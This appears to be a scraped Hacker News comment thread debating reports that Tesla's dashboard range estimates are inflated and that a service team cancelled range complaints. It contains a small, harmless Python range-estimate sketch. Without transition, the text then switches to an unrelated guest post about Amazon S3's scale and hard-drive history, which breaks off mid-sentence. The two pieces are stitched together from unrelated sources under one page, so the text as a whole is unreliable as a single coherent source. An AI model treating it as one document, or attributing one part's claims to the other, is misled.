You are extremely biased. I have owned both a Tesla and a non-Tesla EV. Non-Tesla EVs are way more conservative in their range estimates and you can actually beat their estimates. People routinely beat BMW's advertised EPA range - something you will never hear for a Tesla.
I've owned EVs from different brands, including Tesla. In my experience so far, only Tesla uses the naive and wildly optimistic EPA number for the range display. My wife drives a Bolt and it uses your moving average to calculate the range estimate, and it's pretty much dead-on accurate.
Tesla -could- do it but chooses not to. Put it in trip mode and it's pretty close to dead-on. Look at the consumption page and it's pretty accurate there too. Tesla elects not to use this already available information, because it would consistently show people a lower number than what the web page did when they ordered the car.
What this article describes, if true, is actionable fraud. I'm not seeing this as a "hit piece."
Literally the first paragraph of the piece:
> He expected to get something close to the electric sport sedan's advertised driving range: 353 miles on a fully charged battery.
> He soon realized he was sometimes getting less than half that much range
We're not talking about a couple of miles here or there.
And if Tesla discovered that range issues (even if entirely based around customer perception) were a widespread enough issue to set up a team specifically to address it, that team said nothing publicly and instead cancelled service appointments without explanation... that's absolutely newsworthy, whether you consider it a "hit piece" or not.
> Inside the Nevada team's office, some employees celebrated canceling service appointments by putting their phones on mute and striking a metal xylophone, triggering applause from coworkers who sometimes stood on desks. The team often closed hundreds of cases a week and staffers were tracked on their average number of diverted appointments per day.
I mean... c'mon.
But the example from the article wasn't about a sub 1% delta. It was someone getting less than half the estimated ranged.
This isn't a hit piece. As someone that formerly owned a Tesla, all of this rings true and I was so glad to finally ditch the vehicle back to the second hand market.
Is this any different than companies paying public relations departments to salt the media and internet with positive stories, and downplay negative?
Of course, since Tesla doesn't need, nor have, a PR department (unless they silently re-established one again after closing the first one down in a rather public manner).
No, it's all the same and should be extremely illegal (read felony with mandatory minimums approaching life without parole) as such behavior is antithetical to democracy.
[flagged]
Just curious, did you ever own a high end vehicle before your teslas?
> There are so many people out to get Tesla right now it's hard to process stories like these: the legacy auto makers, their supply chains, their unions, their dealers, the shorts, the elon haters, the ev haters, and on and on.
> There are also a ton of click bait faux outrage articles in general about every subject you can imagine.
I can't help but be disheartened at the financialization (?) of everything. Can't tell who's real and who's shorting.
> There are so many people out to get Tesla right now it's hard to process stories like these
I have no dog in this fight. Never owned or thought about buying a Tesla. The details described in the story, if true, are very serious. Are you suggesting the story is made up?
I'm a firm believer in the idea that people can be brilliant in one way and dumb in many others. Elon seems hellbent on showing us all the ways he's dumb.
Sounds like you're an American who's either a Tesla employee or only owned American cars before. Their quality is mid-tier at best but the software appears to be so dangerous that I avoid driving behind/in front of a Tesla (in Europe).
> Each one of them has been the best car I've ever owned and better than the one before it.
If you buy a new car chances are it will be the best car you've ever owned and better than anything you've driven before.
'I like X, therefore any negative information about X is lies propagated by their enemies' is a dangerous position to take.
'The directive to present the optimistic range estimates came from Tesla Chief Executive Elon Musk, this person said.'
'"Elon wanted to show good range numbers when fully charged," the person said, adding: "When you buy a car off the lot seeing 350-mile, 400-mile range, it makes you feel good."'
Yep, the great Technoking's narcissism manifesting itself in critical technology decisions. Hopefully the ongoing stories of severe mismanagement at Tesla will show people that severe personality flaws matter, especially in technology.
My wife's car broke down, and she took my Subaru for the week, so I ended up with a Chevy Bolt. It wasn't a Tesla, but it was an eye opener for me. Cost per mile was about the same as the Subaru, and the Subaru was a bigger car. Charging was slow and inconvenient. Range? Was really hard to predict in the Bolt because how you drive the vehicle has a big effect on what you get. I was really disappointed in the whole EV thing.
It doesn't help that the Bolt is the worst EV on the market besides the Leaf, mostly due to price point. You also wouldn't notice the slow charging as much if you had a charger installed in your garage, and it's cheaper too.
All that being said, having driven both, it's no competition: a Tesla is far better in every conceivable way. The Model 3 is more efficient with its energy as well.
Giving optimistic estimates based on generalized vehicle information, then giving more precise estimates after the 50% mark—and after having collected usage information based on the user's actual environment—sounds to me like a decent algorithmic solution to a hard problem.
It sounds like a terrible solution to an easy problem. And calling it an 'algorithmic solution' is being generous, considering that our dead-simple, decade-old Mazda 2 gives us a range estimate within 25%, based just on the mpg over the previous X number of miles driven. That's not an algorithm, that is a simple math calculation with only two inputs: fuel consumption rate and miles driven. Tesla, with thousands of data points on previous usage and driver behavior, could give you an almost dead-accurate estimate, but chooses to give a basically useless estimate because it looks better. Then people come around and make ridiculous excuses for it and why it's actually a "decent solution" (it isn't) to a "hard problem" (it's not).
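To illustrate how little is involved, here's a minimal sketch of that kind of two-input, look-back estimate. Everything here (class name, window size, the sample numbers) is made up for illustration:

# Minimal sketch of a look-back range estimate: recent consumption rate
# plus whatever is left in the tank or battery. All values are assumed.
from collections import deque

class RangeEstimator:
    def __init__(self, window_miles=30):
        self.samples = deque()          # (miles, fuel_used) pairs
        self.window_miles = window_miles

    def record(self, miles, fuel_used):
        self.samples.append((miles, fuel_used))
        # keep only roughly the last `window_miles` of driving
        while sum(m for m, _ in self.samples) > self.window_miles:
            self.samples.popleft()

    def estimated_range(self, fuel_remaining):
        miles = sum(m for m, _ in self.samples)
        fuel = sum(f for _, f in self.samples)
        if fuel == 0:
            return None  # no data yet
        return fuel_remaining * (miles / fuel)  # remaining * recent economy

est = RangeEstimator()
est.record(miles=10, fuel_used=0.4)   # 25 mpg in traffic
est.record(miles=20, fuel_used=0.5)   # 40 mpg on the highway
print(f"~{est.estimated_range(fuel_remaining=8.0):.0f} miles left")  # ~267

An EV version is the same idea with kWh in place of gallons; the point is that the estimate tracks how the car has actually been driven rather than a fixed rating.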
Hum... ICE vehicles have shown their remaining fuel in liters for decades, and nobody ever had a problem with it.
They only recently started giving estimates in distance, but it's clearly marked as an unreliable estimation.
Looks like Tesla has another huge communications and UX issue, not a mechanical (electrical?) one. They have to get their designers in a room, fire the management, and ask them to actually design stuff for humans.
That only makes sense if there's strong correlation between the first 50% of a charge and the second 50% of a charge, but NOT an equally strong correlation between the previous charge cycle and the current charge cycle.
That can be the case (eg on road trips) but usually isn't.
Why not just always give the more precise estimates?
Carwow did a test fairly recently: https://www.youtube.com/watch?v=fvwOa7TCd1E
I didn't watch the whole video, but found the summary to be helpful. You can see it at 37m21s: https://youtu.be/fvwOa7TCd1E?t=2241
spoiler: Of the 6 cars they tested, Tesla Model Y had the best performance in terms of miles per kWh and total range. But it still clocked in at only 81% of claimed range.
This is why I don't want a car with OTA updates.
At least a dealer flash takes many months to be deployed, which makes deceptive practices like these easier to spot.
What does this have to do with OTA updates? It could come with the same software "built to lie" from the factory as well, couldn't it?
I have two Teslas. On both of them, I get close to the EPA range in city driving and lose 15%-20% on highway driving at 70-80 mph, on typical daytime temperatures for my area, which rarely drop below 40F in the winter or exceed 100F in the summer. On highways I always use autopilot, which keeps speed much more constant than I would -- it brakes and accelerates much less frequently. The estimates for battery use on trips are always accurate. I consider driving a high-risk chore, so I'm not an aggressive driver.
YMMV.
I'm surprised by the reaction to this article.
1. The range is set by the EPA. They are the ones that do the testing and validate the claims. The EPA should fix their range guidelines for EVs. Maybe a summer and winter range would be more appropriate?
2. Tesla should have a better UI for range, but really they should just show the percentage. Acting like it is a conspiracy is a bit extreme. They are just doing EPA Range * SOC. Without knowing all of the variables of a drive, the estimated range is going to be wrong no matter what you do. People think that their way of being wrong is better than Tesla's. Maybe they're right but the best estimate is still when navigating to a destination, and this estimate Tesla does quite well.
3. Tesla is cancelling the service appointments because there is nothing they can do to 'fix' it. So why waste the time with a service appointment? They are just going to run the same diagnostics they ran remotely. Their software does a fantastic job explaining where your range is going. (https://www.teslaoracle.com/2022/09/26/tesla-new-energy-cons...)
> "We're looking at the range, and you literally see the number decrease in front of your eyes," he said of his dashboard range meter.
From the third paragraph
The EPA tests are poorly implemented, and there are two flavors of tests and the maker chooses which to run. Has to do with the number of 'cycles'. One of these tests tends to return fairly optimistic results, and is the one Tesla chooses for the EPA to run.
Further, EPA only tests at default settings. Some makers (ahem Tesla) default everything to the most range maximizing settings.
Next, car makers can market UP TO the EPA range, but can also market below. Tesla clearly advertises every mile they can, while the Germans undersell their range. You can see this across the board in the real-world range tests by InsideEVs, etc.
Holistically I think having a single EPA range number is wrong given how different highway & city range is for EVs. Just like ICE cars report highway & city MPG, EVs should report range in these 2 buckets.
Since the only real use of the EPA range is to make relative comparisons between cars, and since it will be very wrong for any car outside of the specific speed, geography, and season the EPA tests in, the EPA should choose some arbitrary number that is not miles. Then no one will feel misled when they buy electric, and we'll still be able to make range comparisons between cars.
General range barely ever matters anyway. ICE drivers thinking of going electric always ask about range, but over a certain minimum level of range what really matters is the estimation accuracy for a specific drive and the confidence that a planned charging location will be working as expected. If both of these are very good, the GPS travel time estimates will always be accurate and you don't really need to think about anything, which is how most people approach driving these days anyway: just follow the GPS.
The next thing that matters are the distance of chargers from the average route (we need more at interstate rest stops!) and the availability of 220V chargers at any place you will spend the night. The latter is the weakest right now, IMHO, but it's improving as more people go electric.
I have a Model Y. I hate almost everything about it. But most germane: the 'battery meter' at the top of the display is total bunk. Those have got to be 'rosy' numbers. It'll display the battery in miles, but it's at least 25% inflated.
However, if you punch in a destination, you'll get exact numbers, and those are insanely reliable. It claims (and I don't believe any claims coming from Tesla) that it'll factor in wind, elevation, temperature, etc. But regardless of what it factors in, it's on the money.
I think the range is inflated, but I can get close to it by driving like an absolute grandpa. I think it's possible, but not realistic.
The solution is to not show miles on the basic battery meter, just percentage. Maybe show a range next to it, like 130-160 miles. But that's too honest.
ICE cars all show a fuel gauge (effectively a percentage), and maybe additionally a mileage estimate on newer cars. The fact that they threw that away is a little silly.
We rented one on a trip recently, super annoying to realize the dozen or so chargers in this beach town were actually incompatible or just too slow for real life.
On the way back to the drop-off, Autopilot tried to slam us into the Bentley next to us! It had been traveling the same direction as us for like 20 minutes, and when we passed through an intersection it just jerked hard left and I had to correct it manually. Possible injuries notwithstanding, I'm sure that would have surpassed my insurance coverage, which I've intentionally set way above the minimums.
I know someone who bought an early Leaf to get to work and back. The stated range was 107 miles and their commute was 35 miles each way. The problem was that there was >2000 feet of elevation change.
I also have a Model Y- it's our family's only vehicle. We love almost everything about it.
Tip: tap the range estimate to switch it to percent. The EPA estimate is meaningless. Yes, that should be improved.
Seems like it's common across all EVs for the range to be inflated by around 20%, at least for freeway driving.
In a recent review, a Tesla did a slightly better job than most of the cars tested, as far as portion of stated range achieved.
There is a reason why the mileage estimates on EVs are called GOMs (guess-o-meters). They are like laptop battery estimates: totally unreliable. They should really just stick to percentages. I don't think anyone really relies on the miles left in gas cars; that mentality should carry over to EVs. The number is really the fault of the EPA, which uses a synthetic test and allows manufacturers to just run with that.
This is my experience too. If you plan your trip, it's really good about predicting the % battery remaining. I never put it on miles display anymore; that's evidently going to be inaccurate because it doesn't take into account many other factors. But if I enter in a route, now it actually has something to go on and can do a good job.
ICE vehicles have lower range as well when going uphill or exceeding the optimal speed and increasing air drag.
The estimates are based on driving on a flat road at the speed limit.
Even my Lexus SUV can get 24mpg driving on 35-45mph roads vs 16-19 in the city or going to the mountains where elevation increases.
People's understanding of range is just not quite there yet whether it's for an ICE vehicle or an EV.
If I hated something I would try to sell it immediately. Did you sell it?
Otherwise it looks to me like your rant is just karma collecting.
'I hate almost everything about it.'
Not owning a car and only using rentals, I still think Tesla has the best and most intuitive UI. I can find everything easily, whereas in SUVs from Skoda/VW/Audi/BMW/Renault/... it's hard to find things - at least for me.
What I do hate about the Model Ys we rented is the noise! Wind/wheel noise is as loud at 100 km/h as a BMW at 150 km/h - I guess they do this to save weight and increase range, but it makes the trips very unpleasant.
Also how it randomly brakes in self-driving (at least on the German Autobahn).
I make EVs at a different company, and I'm not a fan of Tesla's range indicator. It's misleading because miles don't map directly onto battery charge. The range it indicates is miles on flat, level ground with no wind at 55 mph, which you will never experience in real life. At 80 mph you're going to get 2/3 of that range every time. At 35 mph you can get significantly higher range, but no one is ever going to drive 300+ miles at 35 mph. If you just tap on the range icon it will change to percent, which is less misleading. ICE vehicles have all the same problems, but most ICE vehicles just show gas level rather than range.
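That ~2/3 figure is roughly what you get if you split consumption into a near-constant rolling-resistance term and an aero term that grows with the square of speed. A back-of-envelope sketch, with assumed ballpark numbers for a mid-size EV (not figures from the comment above):

# Back-of-envelope: why ~80 mph costs roughly a third of the rated range.
# All constants are assumed, ballpark figures for a mid-size EV.
RHO, CDA = 1.2, 0.60               # air density (kg/m^3), drag area Cd*A (m^2)
MASS, CRR, G = 2000, 0.010, 9.81   # mass (kg), rolling-resistance coeff, gravity (m/s^2)

def force_per_meter(v_mps):
    rolling = CRR * MASS * G                 # roughly constant with speed
    aero = 0.5 * RHO * CDA * v_mps ** 2      # grows with v^2
    return rolling + aero                    # newtons == joules per meter of travel

v55, v80 = 55 * 0.44704, 80 * 0.44704        # mph -> m/s
ratio = force_per_meter(v55) / force_per_meter(v80)
print(f"range at 80 mph ≈ {ratio:.0%} of range at 55 mph")  # roughly 2/3

Drivetrain losses and HVAC shift the exact ratio, but the square-law aero term is what dominates the drop at highway speeds.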
Waited for 2 years for the new long range Tesla Model X and sold it within 3 months for exactly this reason. The range was a total fabrication - actual range for city driving was closer to 180 miles, not the claimed 300+. Complete sham.
> It'll display a the battery in miles, but it's at least 25% inflated.
Worth noting this is also common in ICE cars. Mine has it.
Rented a MY a couple months ago and was surprised how much I, and more surprisingly, my wife, hated it. Now, I despise Elon and the risky safety decisions of Tesla engineers, so I'm biased, but I wanted to give them a shot.
Range was horrible. We drove about 100 miles and spent a couple hours over several sessions at superchargers. The handling and turning radius sucked. The controls were frighteningly distracting and confusing. Sound in the cabin seemed very weird, probably due to the glass roof and noise cancelling system. Finally, for a dual motor, I expected a lot more acceleration. I drove a Chevy Bolt for a year and was surprised how heavy and sluggish the MY felt.
I find the range numbers on my Model Y to be fairly accurate, when I choose and am able to drive at optimal speeds on level ground (which is the situation on some trips). 60-65 mph is the commonly cited range for the dual motor Model Y. The range does attempt to factor in heat pump usage, and I am unclear how accurate those adjustments are.
For what it's worth, I have a Nissan standard petrol car and it's pretty much the same. Every time I fill it up, it says I have 400 miles of range, then by the time I've driven about 300 miles, I've only got a few miles of range left.
Interestingly the accuracy seems to get a lot better by the time I'm down to half a tank. I don't know if it's a sensor issue, or maybe my driving habits just change a lot when I have a full tank versus when I'm running low.
The type of driving and time I'm driving can also make a huge difference to my trip MPG - some trips I average about 10MPG, others closer to 40MPG. Generally speaking, low speed but clear rural roads get the best, followed by motorway, followed by pootering around the city. The absolute worst mileage is during the winter, when I might only be driving lots of short trips around town on a very cold engine, with the headlights on, in the rain. In that case, I might only get around 200 miles out of a tank.
Anyway, my point is that knowing the specifics of this trip's fuel consumption is a much easier problem than knowing how many miles it'll be until you next need to refuel.
Bummer to hear you all don't like it. I drove a RWD Long Range Model 3 for 4.5 years. Absolutely loved everything about it. But the range was nowhere near 310 miles as stated. But I couldn't have cared less once I knew that fact. The few times a year I needed more than 200 miles, I used Superchargers on my route just like I would if I had 250-300, and had to wait an extra 2 minutes at the charger. I averaged ~300-325 Wh/mi going 80-90 mph on the highway (wind speed/direction obviously makes a big difference). 75 kWh battery. 230 mile range. Every other day was charge to 80%, incredibly convenient to never think about it or gas, and more torque and speed than any other car you're around. And low to no maintenance.
I now own a Long Range Model X. It is MUCH closer to the EPA mileage. I average ~330 Wh/mi but I have a 100 kWh battery, so it's much closer to a legitimate 300 mile range. Once again, it doesn't really make a difference unless you happen to have an exactly 275 mile trip. Either way, you'll be stopping at a halfway Supercharger to stay in the optimal charge range (15-85%).
It is true that it's very accurate. I was on a trip that predicted 22% battery on arrival, and at one point I was down to 21%. The last 5-10 km were mostly descending down a valley, so a lot of regeneration. Thus, when I arrived: 22%, as predicted.
It's very easy to see how favorably or unfavorably Tesla's claimed range compares to competitors based on independent tests of multiple EVs in the same conditions:
https://www.youtube.com/watch?v=6LWL90paufE
https://www.youtube.com/watch?v=ynCaTDR4rDQ
https://www.youtube.com/watch?v=eFB6hsYXDiA
https://www.youtube.com/watch?v=fvwOa7TCd1E
Spoiler alert: Tesla models fare about as well, if not better, than their EV cousins, hitting around 80% of the stated range in the wild.
The obvious question is why don't you sell the car if you hate everything about it.
Sunk cost and all that
Not defending Tesla, but battery range is really hard without context. Aerodynamic drag grows with the square of speed, so driving twice as fast takes roughly four times the energy per mile just to push through the air. They probably can get the right estimate for a destination because the car knows the speed limits along the route and can use those as the expected velocity, which gives a better answer.
This is not a hard concept, and it's rather surprising that this of all things is what you have issue with.
The battery icon is miles of rated range, where "rated" means a flat, windless road at 60 mph and 70 degrees. Call it "standard" range if you will. The car has no idea where you're going, so it uses the standard calculation.
When you set a destination it can now (and does) factor in elevation change, speed on given roads, wind speed, wind direction, temperature along the route, etc etc etc and is more accurate.
So your least favorite feature is one you openly admit to not using properly? If you want laser precise range estimation set a destination ffs. Or, if you're like most drivers you start every day with 200-300mi of range and unless you're going out of state you don't even think about range.
It's the same problem as displaying the battery percentage on your phone: you're more inclined to look at it, and will be more anxious when that number drops.
I wish Tesla would allow you to hide the battery percentage entirely (unless it drops below a threshold).
My EV6 reports a range that is also a loose estimate, but it seems to be based on recent driving behavior (i.e., if I was driving free and loose recently, I may end up getting way more miles than it says, and vice versa).
Switch to %.
I know how far % will go. Very simple.
The miles figure is a PR stunt.
I actually got stranded once for some hours because of the mileage indicator!
Was driving back from a campsite that, it turned out, I didn't have charging compatibility with, but I thought I had plenty of margin to get to the nearest charger. As I drove through the mountains however, I began noticing that a.) my battery was depleting much faster than expected and b.) I wasn't seeing any houses and very few motorists. I watched with increasing dread as the trip miles began converging with the battery miles, as my friends in the car got more and more quiet. We reached the inflection point, and the best I could do was hope we'd encounter somewhere with a plug that might be able to get us the rest of the way. Eventually though the mileage indicator reached zero, and I pulled off the road to what I thought was a campsite but turned out to be a sort of rest stop with no power plugs in sight. To make matters worse I was in a mountain valley and had no phone signal, and hiking wasn't an option as it was pretty hot and we had no water. We were there for hours until I was able to flag down a nice older couple and get a ride to a place with cell signal, where I was able to get a tow truck capable of transporting my car (turns out you need one with a full bed because of the regenerative braking, and Tesla's service doesn't have infinite coverage) to the charger I was trying to get to.
Ironically that last part was probably the most frustrating. The charging spot was full save one spot in the back, which my tow truck guy Mel couldn't get back to. No sweat, I thought, I'll just try asking someone to swap, but people in their cars pretended to ignore me, and one couple leaving theirs just walked away as I asked if they could move so we could unload my dead car. Had a sudden wave of empathy for the people I usually walk away from who ask me for spare change lol. Eventually someone left and I was able to charge and resume the 6 hour road trip home. Biggest lesson learned was that slow is fast: keep it at 60 if you want the mileage meter to not die as quickly.
Battery meter at the top is EPA range - ie. the official range measurement method, in basically ideal conditions.
The routefinder 'learns' from your previous driving habits. Driving style easily has a 50% impact on range between 'drives 50 mph slipstreaming behind a truck' and 'drives 90 mph and brakes aggressively at every corner'.
https://www.fueleconomy.gov/feg/browseList.jsp
Judging by this, the EPA numbers it gives are accurate on average.
I had a Tesla Model 3 which was very optimistic with the range. My BMW iX3 however is quite conservative and I can usually drive longer than the display states.
I recommend tapping the battery meter to put it into percent instead of EPA miles (useless, misleading) and only estimate range using the trip planner, which is usually quite good.
Shenanigans like that are how you end up with regulations on what a car can display in terms of range. This is similar to how we ended up with strict rules on MPG figures when purchasing.
While there are things to hate on with Tesla cars, range is not one of them. I have a Model Y and for the most part I like it. I plug it in when it needs charging. What's so hard about that? I've been on several 6000+ mile journeys across the country and never had a problem, even out west where charging is more sparse.
The thing I hate most about my car is that I spent $10K on 'Full Self Driving' and rarely use it. It totally sucks and is definitely the worst $10K I've ever spent on anything. That money could have gone to a nice vacation somewhere and I would be happy about that. But no, every time I try out the FSD, I come away disappointed.
> I have a model Y. I hate almost everything about it.
Can you tell more about this? I'm curious.
This has been my experience as well. When there's a disparity, the Energy app gives additional details why the estimate was wrong (driving speed, climate control, etc).
It's what drives me nuts about '300 miles is more than enough'.
Consider:
- batteries lose, best case, about 10-20% of max range over a typical car ownership period
- not charging to the max is very often important to not getting bad degradation, so take another 10% off
- winter can take 10-20% range off
- driving at typical speed as opposed to the alleged ratings is probably another 10-20% reduced range
- headwinds, air conditioning/heating, and other factors can remove another 10-20%.
So suddenly, some 300 mile rated range is actually 150 miles of real world range. So here in the midwest, with underinvested charging infrastructure and biiiiiiggggg states and rural density, a 400 mile range really is pretty much required for any functional long distance driving.
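A quick check of how those percentages compound (the individual factors below are assumed mid-range values from the list above):

# Quick check of the stacking above, using assumed mid-range values
# for each factor listed in the comment.
rated = 300
factors = {
    "battery degradation":  0.85,
    "don't charge to 100%": 0.90,
    "winter":               0.85,
    "real highway speeds":  0.85,
    "headwind / HVAC":      0.85,
}
real_world = rated
for name, f in factors.items():
    real_world *= f
print(f"~{real_world:.0f} miles")  # ~141: roughly half the rated figure on a bad day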
What does the regular display claim to represent?
Coasting on a flat surface at 35mph with a positive tailwind?
> I hate almost everything about it.
By convention, you are required to phrase this as 'I love my Tesla, but...'
> Inside the Nevada team's office, some employees celebrated canceling service appointments by putting their phones on mute and striking a metal xylophone, triggering applause from coworkers who sometimes stood on desks.
That's a fairly amazing display of corporate customer contempt. Shareholders couldn't have shown more disdain for their consumers.
Shareholder disdain and lying on estimates made the stock price go up. They couldn't be happier.
I think it's also an opportunity for each of us to appreciate the frailness of the human condition. In particular, how plastic our minds are, how susceptible to 'narrative' and social pressure (particularly when connected to income) we are. I imagine those employees are pretty normal people, and they were just responding to incentives. They didn't feel they were harming anyone, and in fact were doing a good job according to their bosses. They work at a famous, respected company and surely if the bosses were wrong that would not be the case, right?
This is the utility of the cynic, the questioner, the doubter, the non-conformist. It is an uncomfortable position, at all times, but you need people among you who constantly fear being inadvertently, mindlessly immoral. Because it's a constant threat and more of a threat, I daresay, than overt evil.
795 points 5 days ago by werner in 2565th position
www.allthingsdistributed.com | Estimated reading time – 34 minutes | comments | anchor
Today, I am publishing a guest post from Andy Warfield, VP and distinguished engineer over at S3. I asked him to write this based on the Keynote address he gave at USENIX FAST '23 that covers three distinct perspectives on scale that come along with building and operating a storage system the size of S3.
In today's world of short-form snackable content, we're very fortunate to get an excellent in-depth exposé. It's one that I find particularly fascinating, and it provides some really unique insights into why people like Andy and me joined Amazon in the first place. The full recording of Andy presenting this paper at FAST is embedded at the end of this post.
–W
I've worked in computer systems software — operating systems, virtualization, storage, networks, and security — for my entire career. However, the last six years working with Amazon Simple Storage Service (S3) have forced me to think about systems in broader terms than I ever have before. In a given week, I get to be involved in everything from hard disk mechanics, firmware, and the physical properties of storage media at one end, to customer-facing performance experience and API expressiveness at the other. And the boundaries of the system are not just technical ones: I've had the opportunity to help engineering teams move faster, worked with finance and hardware teams to build cost-following services, and worked with customers to create gob-smackingly cool applications in areas like video streaming, genomics, and generative AI.
What I'd really like to share with you more than anything else is my sense of wonder at the storage systems that are all collectively being built at this point in time, because they are pretty amazing. In this post, I want to cover a few of the interesting nuances of building something like S3, and the lessons learned and sometimes surprising observations from my time in S3.
S3 launched on March 14th, 2006, which means it turned 17 this year. It's hard for me to wrap my head around the fact that for engineers starting their careers today, S3 has simply existed as an internet storage service for as long as you've been working with computers. Seventeen years ago, I was just finishing my PhD at the University of Cambridge. I was working in the lab that developed Xen, an open-source hypervisor that a few companies, including Amazon, were using to build the first public clouds. A group of us moved on from the Xen project at Cambridge to create a startup called XenSource that, instead of using Xen to build a public cloud, aimed to commercialize it by selling it as enterprise software. You might say that we missed a bit of an opportunity there. XenSource grew and was eventually acquired by Citrix, and I wound up learning a whole lot about growing teams and growing a business (and negotiating commercial leases, and fixing small server room HVAC systems, and so on) – things that I wasn't exposed to in grad school.
But at the time, what I was convinced I really wanted to do was to be a university professor. I applied for a bunch of faculty jobs and wound up finding one at UBC (which worked out really well, because my wife already had a job in Vancouver and we love the city). I threw myself into the faculty role and foolishly grew my lab to 18 students, which is something that I'd encourage anyone that's starting out as an assistant professor to never, ever do. It was thrilling to have such a large lab full of amazing people and it was absolutely exhausting to try to supervise that many graduate students all at once, but, I'm pretty sure I did a horrible job of it. That said, our research lab was an incredible community of people and we built things that I'm still really proud of today, and we wrote all sorts of really fun papers on security, storage, virtualization, and networking.
A little over two years into my professor job at UBC, a few of my students and I decided to do another startup. We started a company called Coho Data that took advantage of two really early technologies at the time: NVMe SSDs and programmable ethernet switches, to build a high-performance scale-out storage appliance. We grew Coho to about 150 people with offices in four countries, and once again it was an opportunity to learn things about stuff like the load bearing strength of second-floor server room floors, and analytics workflows in Wall Street hedge funds – both of which were well outside my training as a CS researcher and teacher. Coho was a wonderful and deeply educational experience, but in the end, the company didn't work out and we had to wind it down.
And so, I found myself sitting back in my mostly empty office at UBC. I realized that I'd graduated my last PhD student, and I wasn't sure that I had the strength to start building a research lab from scratch all over again. I also felt like if I was going to be in a professor job where I was expected to teach students about the cloud, that I might do well to get some first-hand experience with how it actually works.
I interviewed at some cloud providers, and had an especially fun time talking to the folks at Amazon and decided to join. And that's where I work now. I'm based in Vancouver, and I'm an engineer that gets to work across all of Amazon's storage products. So far, a whole lot of my time has been spent on S3.
When I joined Amazon in 2017, I arranged to spend most of my first day at work with Seth Markle. Seth is one of S3's early engineers, and he took me into a little room with a whiteboard and then spent six hours explaining how S3 worked.
It was awesome. We drew pictures, and I asked question after question non-stop and I couldn't stump Seth. It was exhausting, but in the best kind of way. Even then S3 was a very large system, but in broad strokes — which was what we started with on the whiteboard — it probably looks like most other storage systems that you've seen.
S3 is an object storage service with an HTTP REST API. There is a frontend fleet with a REST API, a namespace service, a storage fleet that's full of hard disks, and a fleet that does background operations. In an enterprise context we might call these background tasks "data services," like replication and tiering. What's interesting here, when you look at the highest-level block diagram of S3's technical design, is the fact that AWS tends to ship its org chart. This is a phrase that's often used in a pretty disparaging way, but in this case it's absolutely fascinating. Each of these broad components is a part of the S3 organization. Each has a leader, and a bunch of teams that work on it. And if we went into the next level of detail in the diagram, expanding one of these boxes out into the individual components that are inside it, what we'd find is that all the nested components are their own teams, have their own fleets, and, in many ways, operate like independent businesses.
All in, S3 today is composed of hundreds of microservices that are structured this way. Interactions between these teams are literally API-level contracts, and, just like the code that we all write, sometimes we get modularity wrong and those team-level interactions are kind of inefficient and clunky, and it's a bunch of work to go and fix it, but that's part of building software, and it turns out, part of building software teams too.
Before Amazon, I'd worked on research software, I'd worked on pretty widely adopted open-source software, and I'd worked on enterprise software and hardware appliances that were used in production inside some really large businesses. But by and large, that software was a thing we designed, built, tested, and shipped. It was the software that we packaged and the software that we delivered. Sure, we had escalations and support cases and we fixed bugs and shipped patches and updates, but we ultimately delivered software. Working on a global storage service like S3 was completely different: S3 is effectively a living, breathing organism. Everything, from developers writing code running next to the hard disks at the bottom of the software stack, to technicians installing new racks of storage capacity in our data centers, to customers tuning applications for performance, everything is one single, continuously evolving system. S3's customers aren't buying software, they are buying a service and they expect the experience of using that service to be continuously, predictably fantastic.
The first observation was that I was going to have to change, and really broaden how I thought about software systems and how they behave. This didn't just mean broadening thinking about software to include those hundreds of microservices that make up S3, it meant broadening to also include all the people who design, build, deploy, and operate all that code. It's all one thing, and you can't really think about it just as software. It's software, hardware, and people, and it's always growing and constantly evolving.
The second observation was that despite the fact that this whiteboard diagram sketched the broad strokes of the organization and the software, it was also wildly misleading, because it completely obscured the scale of the system. Each one of the boxes represents its own collection of scaled out software services, often themselves built from collections of services. It would literally take me years to come to terms with the scale of the system that I was working with, and even today I often find myself surprised at the consequences of that scale.
It probably isn't very surprising for me to mention that S3 is a really big system, and it is built using a LOT of hard disks. Millions of them. And if we're talking about S3, it's worth spending a little bit of time talking about hard drives themselves. Hard drives are amazing, and they've kind of always been amazing.
The first hard drive was built by Jacob Rabinow, who was a researcher for the predecessor of the National Institute of Standards and Technology (NIST). Rabinow was an expert in magnets and mechanical engineering, and he'd been asked to build a machine to do magnetic storage on flat sheets of media, almost like pages in a book. He decided that idea was too complex and inefficient, so, stealing the idea of a spinning disk from record players, he built an array of spinning magnetic disks that could be read by a single head. To make that work, he cut a pizza slice-style notch out of each disk that the head could move through to reach the appropriate platter. Rabinow described this as being like "reading a book without opening it." The first commercially available hard disk appeared 7 years later in 1956, when IBM introduced the 350 disk storage unit, as part of the 305 RAMAC computer system. We'll come back to the RAMAC in a bit.
Today, 67 years after that first commercial drive was introduced, the world uses lots of hard drives. Globally, the number of bytes stored on hard disks continues to grow every year, but the applications of hard drives are clearly diminishing. We just seem to be using hard drives for fewer and fewer things. Today, consumer devices are effectively all solid-state, and a large amount of enterprise storage is similarly switching to SSDs. Jim Gray predicted this direction in 2006, when he very presciently said: "Tape is Dead. Disk is Tape. Flash is Disk. RAM Locality is King." This quote has been used a lot over the past couple of decades to motivate flash storage, but the thing it observes about disks is just as interesting.
Hard disks don't fill the role of general storage media that they used to because they are big (physically and in terms of bytes), slow, and relatively fragile pieces of media. For almost every common storage application, flash is superior. But hard drives are absolute marvels of technology and innovation, and for the things they are good at, they are absolutely amazing. One of these strengths is cost efficiency, and in a large-scale system like S3, there are some unique opportunities to design around some of the constraints of individual hard disks.
As I was preparing for my talk at FAST, I asked Tim Rausch if he could help me revisit the old plane flying over blades of grass hard drive example. Tim did his PhD at CMU and was one of the early researchers on heat-assisted magnetic recording (HAMR) drives. Tim has worked on hard drives generally, and HAMR specifically for most of his career, and we both agreed that the plane analogy – where we scale up the head of a hard drive to be a jumbo jet and talk about the relative scale of all the other components of the drive – is a great way to illustrate the complexity and mechanical precision that's inside an HDD. So, here's our version for 2023.
Imagine a hard drive head as a 747 flying over a grassy field at 75 miles per hour. The air gap between the bottom of the plane and the top of the grass is two sheets of paper. Now, if we measure bits on the disk as blades of grass, the track width would be 4.6 blades of grass wide and the bit length would be one blade of grass. As the plane flew over the grass it would count blades of grass and only miss one blade for every 25 thousand times the plane circled the Earth.
That's a bit error rate of 1 in 10^15 requests. In the real world, we see that blade of grass get missed pretty frequently – and it's actually something we need to account for in S3.
Now, let's go back to that first hard drive, the IBM RAMAC from 1956. Here are some specs on that thing:
